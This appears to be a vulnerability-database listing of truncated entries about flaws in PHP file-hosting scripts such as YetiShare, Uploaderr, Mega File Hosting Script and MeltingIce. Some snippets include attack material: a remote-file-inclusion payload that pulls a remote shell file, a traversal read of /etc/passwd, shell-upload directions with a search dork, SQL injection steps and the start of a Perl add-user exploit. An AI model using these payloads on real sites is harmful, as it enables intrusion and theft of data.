EUVD-2009-3622

Malware in sbrugna...

EUVD-2008-2516

Malware in sbrugna...

YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery

Title: YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery Date: 09.01.2021 Author: Numan Türle Vendor Homepage: https://mfscripts.com Software Link: https://yetishare.com Version: v5.1.0 Tested on: YetiShare - File Hosting Script v5.1.0, Php Version : 7.4 Summary ---------...

MFScripts YetiShare Cross-Site Scripting Vulnerability

Mellow Fish YetiShare is a PHP-based file hosting web system script from Mellow Fish UK. A cross-site scripting vulnerability exists in the getallfileserverpaths.ajax.php file in Mellow Fish YetiShare versions 3.5.2 through 4.5.3. The vulnerability stems from a lack of proper validation of...

Uploaderr 1.0 File Hosting Script - Arbitrary File Upload

Exploit Title: Uploaderr - File Hosting Script Shell Upload Vulnerability Author: DigitALL Vendor: http://uploaderr.com Version: 1.0 Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members Dork: "Instant Free File Uploader" Application: Please Add Files Your Shell And Upload. Shell : /upload...

Uploaderr 1.0 File Hosting Script - Arbitrary File Upload

Uploaderr 1.0 File Hosting Script - Arbitrary File Upload Exploit Title: Uploaderr - File Hosting Script Shell Upload Vulnerability Author: DigitALL Vendor: http://uploaderr.com Version: 1.0 Greetz: Zombie KroNickq HackSpy and ALL 1923Turk.Biz Members Dork: "Instant Free File Uploader" Applicatio...

Uploader 1.0 - File Hosting Script Shell Upload Vulnerability

Exploit for unknown platform in category web applications ============================================================== Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability ============================================================== Dork: "Instant Free File Uploader" Application:...

Cross site scripting

Cross-site scripting XSS vulnerability in emaullinks.php in YABSoft Mega File Hosting Script aka MFH or MFHS 1.2 allows remote attackers to inject arbitrary web script or HTML via the moudi parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third...

CVE-2009-3647

CVE-2009-3647 describes a cross-site scripting (XSS) vulnerability in the YABSoft Mega File Hosting Script (MFH/MFHS) 1.2, where an attacker can inject arbitrary web script or HTML via the moudi parameter in emaullinks.php. The evidence in connected sources confirms the affected component and the...

CVE-2009-3647

Cross-site scripting XSS vulnerability in emaullinks.php in YABSoft Mega File Hosting Script aka MFH or MFHS 1.2 allows remote attackers to inject arbitrary web script or HTML via the moudi parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third...

Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability

Exploit for unknown platform in category web applications ============================================================== Mega File Hosting Script 1.2 cross.php url RFI Vulnerability ============================================================== Mega File Hosting || Remote/Local File inclusion For...

Mega File Hosting Script 1.2 - url Remote File Inclusion

Mega File Hosting Script 1.2 - url Remote File Inclusion Mega File Hosting || Remote/Local File inclusion For All Version Just addition This Exploit and enjoy /cross.php?url=http://site.com/sh3ll.txt /cross.php?url=../../../.../../../../../etc/passwd%00 Author Garry /// 25/02/2009 Www.Hacking.ge...

CVE-2008-2521

SQL injection vulnerability in members.php in YABSoft Mega File Hosting Script aka MFH or MFHS 1.2 allows remote authenticated users to execute arbitrary SQL commands via the fid parameter...

Sql injection

SQL injection vulnerability in members.php in YABSoft Mega File Hosting Script aka MFH or MFHS 1.2 allows remote authenticated users to execute arbitrary SQL commands via the fid parameter...

CVE-2008-2521

The CVE describes a SQL injection in the YABSoft Mega File Hosting Script (MFH/MFHS) version 1.2, specifically in members.php, where the fid parameter can be manipulated by remote authenticated users to execute arbitrary SQL commands. The entry is supported by multiple sources (NVD, CVE lists, an...

CVE-2008-2521

SQL injection vulnerability in members.php in YABSoft Mega File Hosting Script aka MFH or MFHS 1.2 allows remote authenticated users to execute arbitrary SQL commands via the fid parameter...

MeltingIce File System <= 1.0 Remote Arbitrary Add-User Exploit

Exploit for unknown platform in category web applications =============================================================== MeltingIce File System ; print "\nUsernamecreate's your username: "; chompmy $usr=; print "\nPasswordcreate's your password: "; chompmy $pwd=; print "\nEnter Quotaquotamb of...

MeltingIce File System 1.0 - Arbitrary Add User

MeltingIce File System 1.0 - Arbitrary Add User !/usr/bin/perl use strict; use LWP::UserAgent; NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly...

Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability

No description provided by source. Script: Mega File Hosting script Type: SQL Injection 1923TURK.ORG TURKiSHWARRiORR Step 1: Register an account Step 2: login and go to /members.php?folders=1 Step 3: Create a folder with any name Exploitation options: ADIM 1:...

Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ===================================================================== Mega File Hosting Script 1.2 fid Remote SQL Injection Vulnerability ===================================================================== Script: Mega File Hosting scrip...